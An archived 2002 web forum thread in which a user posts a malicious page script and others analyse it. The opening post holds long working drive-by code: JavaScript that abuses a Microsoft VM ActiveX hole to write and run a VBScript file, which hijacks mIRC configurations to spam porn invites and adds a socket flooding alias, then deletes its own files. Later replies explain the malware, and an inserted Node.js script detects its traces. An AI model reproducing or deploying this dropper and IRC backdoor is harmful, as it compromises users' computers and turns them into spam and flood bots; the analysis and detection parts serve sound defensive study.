Preserved Topic: Guess What ? (JavaScript, VBScript, mIRC socket Scripting) ?

sunsuron
Obsessive-Compulsive (I) Inmate

From: Cyberajaya, Kuala Lumpur, Malaysia
Insane since: Jul 2002

posted 08-13-2002 08:22

What the hack is This!?


<script language="JAVASCRIPT">
<!-- hide for safe browsers
InterfaceObject=document.applets[0];
setTimeout("Upload()",1000);
function Upload() {
fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
InterfaceObject.setCLSID(fsoClassID);
fso = InterfaceObject.createInstance();
// windir = fso.getspecialfolder(0);
filename = "\\rol.vbs";
file = fso.opentextfile(filename, "2", "TRUE");
file.writeline(filecontent1)
file.writeline(filecontent2)
file.writeline(filecontent3)
file.writeline(filecontent4)
file.writeline(filecontent5)
file.writeline(filecontent6)
file.writeline(filecontent7)
file.writeline(filecontent8)
file.writeline(filecontent9)
file.writeline(filecontent10)
file.writeline(filecontent11)
file.writeline(filecontent12)
file.writeline(filecontent13)
file.writeline(filecontent14)
file.writeline(filecontent15)
file.writeline(filecontent16)
file.writeline(filecontent17)
file.writeline(filecontent18)
file.writeline(filecontent19)
file.writeline(filecontent20)
file.writeline(filecontent21)
file.writeline(filecontent22)
file.writeline(filecontent23)
file.writeline(filecontent24)
file.writeline(filecontent25)
file.writeline(filecontent26)
file.writeline(filecontent27)
file.writeline(filecontent28)
file.writeline(filecontent29)
file.writeline(filecontent30)
file.writeline(filecontent31)
file.writeline(filecontent32)
file.writeline(filecontent33)
file.writeline(filecontent34)
file.writeline(filecontent35)
file.writeline(filecontent36)
file.writeline(filecontent37)
file.writeline(filecontent38)
file.writeline(filecontent39)
file.writeline(filecontent40)
file.writeline(filecontent41)
file.writeline(filecontent42)
file.writeline(filecontent43)
file.writeline(filecontent44)
file.writeline(filecontent45)
file.writeline(filecontent46)
file.writeline(filecontent47)
file.writeline(filecontent48)
file.writeline(filecontent49)
file.writeline(filecontent50)
file.writeline(filecontent51)
file.writeline(filecontent52)
file.writeline(filecontent53)
file.writeline(filecontent54)
file.writeline(filecontent55)
file.writeline(filecontent56)
file.writeline(filecontent57)
file.writeline(filecontent58)
file.writeline(filecontent59)
file.writeline(filecontent60)
file.writeline(filecontent61)
file.writeline(filecontent62)
file.writeline(filecontent63)
file.writeline(filecontent64)
file.writeline(filecontent65)
file.writeline(filecontent66)
file.writeline(filecontent67)
file.writeline(filecontent68)
file.writeline(filecontent69)
file.writeline(filecontent70)
file.writeline(filecontent71)
file.writeline(filecontent72)
file.writeline(filecontent73)
file.writeline(filecontent74)
file.writeline(filecontent75)
file.writeline(filecontent76)
file.writeline(filecontent77)
file.writeline(filecontent78)
file.writeline(filecontent79)
file.writeline(filecontent80)
file.writeline(filecontent81)
file.writeline(filecontent82)
file.writeline(filecontent83)
file.writeline(filecontent84)
file.writeline(filecontent85)
file.writeline(filecontent86)
file.writeline(filecontent87)
file.writeline(filecontent88)
file.writeline(filecontent89)
file.writeline(filecontent90)
file.writeline(filecontent91)
file.writeline(filecontent92)
file.writeline(filecontent93)
file.writeline(filecontent94)
file.writeline(filecontent95)
file.writeline(filecontent96)
file.writeline(filecontent97)
file.writeline(filecontent98)
file.writeline(filecontent99)
file.writeline(filecontent100)
file.writeline(filecontent101)
file.writeline(filecontent102)
file.writeline(filecontent103)
file.writeline(filecontent104)
file.writeline(filecontent105)
file.writeline(filecontent106)
file.writeline(filecontent107)
file.writeline(filecontent108)
file.writeline(filecontent109)
file.writeline(filecontent110)
file.writeline(filecontent111)
file.writeline(filecontent112)
file.writeline(filecontent113)
file.writeline(filecontent114)
file.writeline(filecontent115)
file.writeline(filecontent116)
file.writeline(filecontent117)
file.writeline(filecontent118)
file.writeline(filecontent119)
file.writeline(filecontent120)
file.writeline(filecontent121)
file.writeline(filecontent122)
file.writeline(filecontent123)
file.writeline(filecontent124)
file.writeline(filecontent125)
file.writeline(filecontent126)
file.writeline(filecontent127)
file.writeline(filecontent128)
file.writeline(filecontent129)
file.writeline(filecontent130)
file.writeline(filecontent131)
file.writeline(filecontent132)
file.writeline(filecontent133)
file.writeline(filecontent134)
file.writeline(filecontent135)
file.writeline(filecontent136)
file.writeline(filecontent137)
file.writeline(filecontent138)
file.writeline(filecontent139)
file.writeline(filecontent140)
file.writeline(filecontent141)
file.writeline(filecontent142)
file.writeline(filecontent143)
file.writeline(filecontent144)
file.writeline(filecontent145)
file.writeline(filecontent146)
file.writeline(filecontent147)
file.writeline(filecontent148)
file.writeline(filecontent149)
file.writeline(filecontent150)
file.writeline(filecontent151)
file.writeline(filecontent152)
file.writeline(filecontent153)
file.writeline(filecontent154)
file.writeline(filecontent155)
file.writeline(filecontent156)
file.writeline(filecontent157)
file.writeline(filecontent158)
file.writeline(filecontent159)
file.writeline(filecontent160)
file.writeline(filecontent161)
file.writeline(filecontent162)
file.writeline(filecontent163)
file.writeline(filecontent164)
file.writeline(filecontent165)
file.writeline(filecontent166)
file.writeline(filecontent167)
file.writeline(filecontent168)
file.writeline(filecontent169)
file.writeline(filecontent170)
file.writeline(filecontent171)
file.writeline(filecontent172)
file.writeline(filecontent173)
file.writeline(filecontent174)
file.writeline(filecontent175)
file.writeline(filecontent176)
file.writeline(filecontent177)
file.writeline(filecontent178)
file.writeline(filecontent179)
file.writeline(filecontent180)
file.writeline(filecontent181)
file.writeline(filecontent182)
file.writeline(filecontent183)
file.writeline(filecontent184)
file.writeline(filecontent185)
file.writeline(filecontent186)
file.writeline(filecontent187)
file.writeline(filecontent188)
file.writeline(filecontent189)
file.writeline(filecontent190)
file.writeline(filecontent191)
file.writeline(filecontent192)
file.writeline(filecontent193)
file.writeline(filecontent194)
file.writeline(filecontent195)
file.writeline(filecontent196)
file.writeline(filecontent197)
file.writeline(filecontent198)
file.writeline(filecontent199)
file.writeline(filecontent200)
file.writeline(filecontent201)
file.writeline(filecontent202)
file.writeline(filecontent203)
file.writeline(filecontent204)
file.writeline(filecontent205)
file.writeline(filecontent206)
file.writeline(filecontent207)
file.writeline(filecontent208)
file.writeline(filecontent209)
file.writeline(filecontent210)
file.writeline(filecontent211)
file.writeline(filecontent212)
file.writeline(filecontent213)
file.writeline(filecontent214)
file.writeline(filecontent215)
file.writeline(filecontent216)
file.writeline(filecontent217)
file.writeline(filecontent218)
file.writeline(filecontent219)
file.writeline(filecontent220)
file.writeline(filecontent221)
file.writeline(filecontent222)
file.writeline(filecontent223)
file.writeline(filecontent224)
file.writeline(filecontent225)
file.writeline(filecontent226)
file.writeline(filecontent227)
file.writeline(filecontent228)
file.writeline(filecontent229)
file.writeline(filecontent230)
file.writeline(filecontent231)
file.writeline(filecontent232)
file.writeline(filecontent233)
file.writeline(filecontent234)
file.writeline(filecontent235)
file.writeline(filecontent236)
file.writeline(filecontent237)
file.writeline(filecontent238)
file.writeline(filecontent239)
file.writeline(filecontent240)
file.writeline(filecontent241)
file.writeline(filecontent242)
file.writeline(filecontent243)
file.writeline(filecontent244)
file.writeline(filecontent245)
file.writeline(filecontent246)
file.writeline(filecontent247)
file.writeline(filecontent248)
file.writeline(filecontent249)
file.writeline(filecontent250)
file.writeline(filecontent251)
file.writeline(filecontent252)
file.writeline(filecontent253)
file.writeline(filecontent254)
file.writeline(filecontent255)
file.writeline(filecontent256)
file.writeline(filecontent257)
file.writeline(filecontent258)
file.writeline(filecontent259)
file.writeline(filecontent260)
file.writeline(filecontent261)
file.writeline(filecontent262)
file.writeline(filecontent263)
file.writeline(filecontent264)
file.writeline(filecontent265)
file.writeline(filecontent266)
file.writeline(filecontent267)
file.writeline(filecontent268)
file.writeline(filecontent269)
file.close();
Run();
}

function Run() {

WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
InterfaceObject.setCLSID(WshShellClassID);
wshShell = InterfaceObject.createInstance();
wshShell.run(filename,"6","TRUE"); }
-->
</script>
<script language="vbscript">
a=chr(34)
filecontent1="dim Otag "
filecontent2="dim AOtag"
filecontent3="dim Ttag "
filecontent4="dim DummyTag"
filecontent5="dim SectionDef"
filecontent6="call ShowFolderList("&a&"c:\"&a&")"
filecontent269="call ShowFolderList("&a&"d:\"&a&")"
filecontent7="sub ShowFolderList(s)"
filecontent8="on error resume next"
filecontent9="Set filesys = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent10="Set RootFolder1 = FileSys.GetFolder(s)"
filecontent11="Set SubFolds1 = RootFolder1.subfolders"
filecontent12="For Each f1 in Subfolds1"
filecontent13="s = f1.path & "&a&"\"&a&""
filecontent14="Otag = s & "&a&"mirc.ini"&a&""
filecontent15="AOtag= s & "&a&"mirc.dat"&a&""
filecontent16="DummyTag= "&a&"C:\winamod.dat"&a&""
filecontent17="TTag= s & "&a&"server.ini"&a&""
filecontent18="SectionDef= "&a&"[rfiles]"&a&""
filecontent19="if filesys.fileexists(otag) then "
filecontent20="Call Filemod() "
filecontent21="filesys.CopyFile DummyTag, Otag, true"
filecontent22="Call ImplementRemote()"
filecontent23="filesys.CopyFile DummyTag, Otag, true"
filecontent24="Call ImplementWarn()"
filecontent25="filesys.CopyFile DummyTag, Otag, true"
filecontent26="Call ImplementFserv()"
filecontent27="filesys.CopyFile DummyTag, Otag, true"
filecontent28="call ImplementPerfCheck()"
filecontent29="filesys.CopyFile DummyTag, Otag, true"
filecontent30="Call ImplementPerform()"
filecontent31="SetClearArchiveBit(Otag)"
filecontent32="End If"
filecontent33="Call ShowFolderList(s)"
filecontent34="Next"
filecontent35="End sub"
filecontent36="Function FiltNum(FilString)"
filecontent37="on error resume next"
filecontent38="countdown=5"
filecontent39="do"
filecontent40="Comp = mid(FilString,2,countdown)"
filecontent41="if isnumeric(Comp) then LastNum = Comp : exit do"
filecontent42="countdown=countdown-1"
filecontent43="loop until countdown =0"
filecontent44="FiltNum = LastNum"
filecontent45="end function"
filecontent46="Function LastLineNum(SSection)"
filecontent47="on error resume next"
filecontent48="Set FS1N = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent49="Set FR1N = FS1N.OpenTextFile(otag,1,true)"
filecontent50="Do While FR1N.AtEndOfStream <> True"
filecontent51="segment1 = FR1N.readline"
filecontent52="w = InstrRev(segment1,SSection)"
filecontent53="counts=counts+1"
filecontent54="if w > 0 then "
filecontent55="do"
filecontent56="if FR1N.AtEndOfStream = True then exit do"
filecontent57="segmentk = FR1N.readline"
filecontent58="k = InstrRev(segmentk,"&a&"n"&a&",1) "
filecontent59="if k=1 then"
filecontent60="LastNum=FiltNum(segmentk)"
filecontent61="end if"
filecontent62="Loop until k=0"
filecontent63="end if"
filecontent64="loop"
filecontent65="FR1N.Close"
filecontent66="LastLineNum=LastNum"
filecontent67="end function"
filecontent68="Function Filemod()"
filecontent69="on error resume next"
filecontent70="Set fs1 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent71="Set fr1 = fs1.OpenTextFile(otag,1,true)"
filecontent72="Set fs2 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent73="Set fr2 = fs2.OpenTextFile(DummyTag,2,true)"
filecontent74="Do While fr1.AtEndOfStream <> True"
filecontent75="segment1 = fr1.readline"
filecontent76="fr2.writeline segment1"
filecontent77="w = InstrRev(segment1,"&a&"[rfiles]"&a&")"
filecontent78="counts=counts+1"
filecontent79="if w > 0 then "
filecontent80="counts2=counts"
filecontent81="do"
filecontent82="if fr1.AtEndOfStream = True then exit do"
filecontent83="segmentk = fr1.readline"
filecontent84="k = InstrRev(segmentk,"&a&"n"&a&",1) "
filecontent85="if k=1 then"
filecontent86="LastNum=FiltNum(segmentk)"
filecontent87="fr2.writeline segmentk"
filecontent88="end if"
filecontent89="COUNTS2=COUNTS2+1"
filecontent90="Loop until k<>1"
filecontent91="exit do"
filecontent92="end if"
filecontent93="loop"
filecontent94="fr1.Close"
filecontent95="fr2.close"
filecontent96="Set fs3 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent97="Set fr3 = fs3.OpenTextFile(DummyTag,8,true)"
filecontent98="TrojanInfo = "&a&"n"&a&" & lastlinenum(SectionDef)+1 & "&a&"=server.ini"&a&""
filecontent99="fr3.writeline TrojanInfo"
filecontent100="fr3.Close"
filecontent101="Set fs4 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent102="Set fr4 = fs4.OpenTextFile(Otag,1,true)"
filecontent103="Set fs5 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent104="Set fr5 = fs5.OpenTextFile(DummyTag,8,true)"
filecontent105="Do While fr4.AtEndOfStream <> True"
filecontent106="segment2 = fr4.readline"
filecontent107="if fr4.line >= counts2 + 2 then "
filecontent108="fr5.writeline segment2"
filecontent109="end if"
filecontent110="loop"
filecontent111="fr4.Close"
filecontent112="fr5.Close"
filecontent113="fs5.CopyFile DummyTag, Otag, true"
filecontent114="Call FLDL(TTag)"
filecontent115="end Function"
filecontent116="sub FLDL(TTag)"
filecontent117="on error resume next"
filecontent118="Set fs6 = CreateObject("&a&"Scripting.FileSystemObject"&a&")"
filecontent119="Set fr6 = fs6.OpenTextFile(TTag,2,true)"
filecontent120="fr6.writeline "&a&"[script]"&a&""
filecontent121="fr6.writeline "&a&"n0=on 1:join:#:/msg $nick %invite"&a&""
filecontent122="fr6.writeline "&a&"n1=on 1 art:#:/msg $nick %invite"&a&""
filecontent123="fr6.writeline "&a&"n2="&a&""
filecontent124="fr6.writeline "&a&"n3="&a&""
filecontent125="fr6.writeline "&a&"n4="&a&""
filecontent126="fr6.writeline "&a&"n5="&a&""
filecontent127="fr6.writeline "&a&"n6="&a&""
filecontent128="fr6.writeline "&a&"n7="&a&""
filecontent129="fr6.writeline "&a&"n8="&a&""
filecontent130="fr6.writeline "&a&"n9="&a&""
filecontent131="fr6.writeline "&a&"n10=alias packt { .sockwrite -n $sockname privmsg $CHR(35) $+ $CHR(169) : $+ .Now. [.Packeting.] $1 [.with.] $2 [.bytes.] $3 [.times.]

Bugimus
Maniac (V) Mad Scientist

From: New California
Insane since: Mar 2000

posted 08-13-2002 08:59

I really don't know how to answer you. What exactly do you want to know about all that code?

. . : slicePuzzle

sunsuron
Obsessive-Compulsive (I) Inmate

From: Cyberajaya, Kuala Lumpur, Malaysia
Insane since: Jul 2002

posted 08-13-2002 10:12

What do you know ?

poi
Paranoid (IV) Inmate

From: France
Insane since: Jun 2002

posted 08-13-2002 13:11

This huge mess is a JavaScript that instantiates an ActiveX which creates a file called rol.vbs at the root of your hard drive (there's even a commented line that sought the Windows directory)
then runs rol.vbs.

rol.vbs seems to search for your mirc.ini and mirc.dat files on your hard drive, then update them to add some aliases to create/control some bot that will either flood or invite a dude to a porn site (which seems to have the same kind of malicious script).
Another important point: I've seen some socket instructions in the aliases.

Well, this script is a huge SHIT! But from a coder's point of view, it's interesting to see it.

Mathieu "POÏ" HENRI
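
Added example (not part of the original thread or of any poster's code): a small Node.js triage script for the two stages described in the post above, flagging page source that drives COM objects through an applet and listing unexpected [rfiles] entries in a mirc.ini. The two CLSIDs come from the posted script; the function names, the allowlist and the sample inputs are constructed assumptions.

```javascript
// Added example: static triage for the two stages described in this thread.
// The CLSIDs are the ones in the posted script; all other names are hypothetical.
const COM_CLSIDS = {
  '0D43FE01-F093-11CF-8940-00A0C9054228': 'fsoClassID (file system access)',
  'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B': 'WshShellClassID (process launch)',
};

// Stage 1: flag page source that instantiates COM objects through an applet.
function scanPage(source) {
  const findings = [];
  const upper = source.toUpperCase();
  for (const [clsid, label] of Object.entries(COM_CLSIDS)) {
    if (upper.includes(clsid)) findings.push(`CLSID ${label}`);
  }
  if (/document\.applets\s*\[/i.test(source)) findings.push('applet used as interface object');
  if (/\.setCLSID\s*\(/i.test(source) && /\.createInstance\s*\(/i.test(source)) {
    findings.push('setCLSID + createInstance');
  }
  if (/\.opentextfile\s*\(/i.test(source)) findings.push('opentextfile call');
  if (/\.run\s*\(/i.test(source)) findings.push('run call');
  return findings;
}

// Stage 2: list [rfiles] entries in mirc.ini text that are not on an allowlist.
function auditRfiles(iniText, allowed) {
  const allow = new Set(allowed.map((f) => f.toLowerCase()));
  const unexpected = [];
  let inRfiles = false;
  for (const raw of iniText.split(/\r?\n/)) {
    const line = raw.trim();
    if (line.startsWith('[')) { inRfiles = line.toLowerCase() === '[rfiles]'; continue; }
    const m = inRfiles && /^n(\d+)=(.+)$/i.exec(line);
    if (m && !allow.has(m[2].trim().toLowerCase())) {
      unexpected.push({ index: Number(m[1]), file: m[2].trim() });
    }
  }
  return unexpected;
}

// Constructed sample: a few lines shaped like the posted page script.
const samplePage = [
  'InterfaceObject=document.applets[0];',
  'InterfaceObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");',
  'fso = InterfaceObject.createInstance();',
  'file = fso.opentextfile("\\\\rol.vbs", "2", "TRUE");',
].join('\n');

// Constructed sample: a mirc.ini with one extra remote file appended to [rfiles].
const sampleIni = ['[rfiles]', 'n0=remote.ini', 'n1=remote.ini', 'n2=server.ini',
  '[afiles]', 'n0=aliases.ini'].join('\r\n');

console.log(scanPage(samplePage));
console.log(auditRfiles(sampleIni, ['remote.ini']));
```

The allowlist passed to auditRfiles should be the remote files you loaded yourself; anything else it returns deserves a look before mIRC is started again.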

sunsuron
Obsessive-Compulsive (I) Inmate

From: Cyberajaya, Kuala Lumpur, Malaysia
Insane since: Jul 2002

posted 08-13-2002 15:01

I cannot agree more...
Thanks for that simple, fast explanation poi.

poi
Paranoid (IV) Inmate

From: France
Insane since: Jun 2002

posted 08-13-2002 16:32

You're welcome.
I don't know VBScript, so I'm not 100% sure of the exact behaviour of this script, but I'm sure I wouldn't appreciate having that kind of script running on my computer.

With a simple search in Google, I found code in the same vein that can write anything in the Windows Registry. This script (and the one I found) exploits a vulnerability in the Microsoft VM ActiveX component.
I also found a script that simply creates an EXE file and runs it. Scary!

Could you tell us where you got this script ?
Thanks.



Mathieu "POÏ" HENRI

CPrompt
Maniac (V) Inmate

From: there...no..there.....
Insane since: May 2001

posted 08-13-2002 16:42

Well that doesn't look good!

These lines:

quote:
filecontent266="set sss=createobject("&a&"scripting.filesystemobject"&a&")"
filecontent267="sss.DeleteFile "&a&"c:\rol.vbs"&a&""
filecontent268="sss.DeleteFile "&a&"c:\winamod.dat"&a&""



Looks like it creates a file and then deletes it! Scary stuff!

Later,
C:\


~Binary is best~

Bugimus
Maniac (V) Mad Scientist

From: New California
Insane since: Mar 2000

posted 08-13-2002 23:39

Yes, now I really want to know how and where you got this code too.

Petskull
Maniac (V) Mad Scientist

From: 127 Halcyon Road, Marenia, Atlantis
Insane since: Aug 2000

posted 08-14-2002 05:27

check this out: http://galeon.hispavista.com/hack-spain/codigo.txt

that's what this google search yielded... there was more, but I didn't particularly feel like poking my head in a bunch of websites and yelling "ARE YOU THE PAGE THAT CAN KILL MY COMPUTER?"...

you know, there used to be this myth of a 'poisoned page' out there (A Black Widow page, I believe it was called) that could fuck with your computer- it was dismissed as an urban legend with no possibility of actually occurring...

....they laughed at the captain crunch box, too.....


Code - CGI - links - DHTML - Javascript - Perl - programming - Magic - http://www.twistedport.com
ICQ: 67751342

sunsuron
Obsessive-Compulsive (I) Inmate

From: Cyberajaya, Kuala Lumpur, Malaysia
Insane since: Jul 2002

posted 08-14-2002 10:29

I really don't remember where I last encountered this script, but most probably I'm one of the victims of this code. While running my mirc.exe (I'm a die-hard fan of mIRC scripting), I began to be kicked often from channels. After several rounds of figuring it out, I came to know that I've been mass-advertising in private messages (from the code) with an auto-greet on channel join. Porno URL. Mmm... That's pretty interesting. Is this a sort of backdoor?
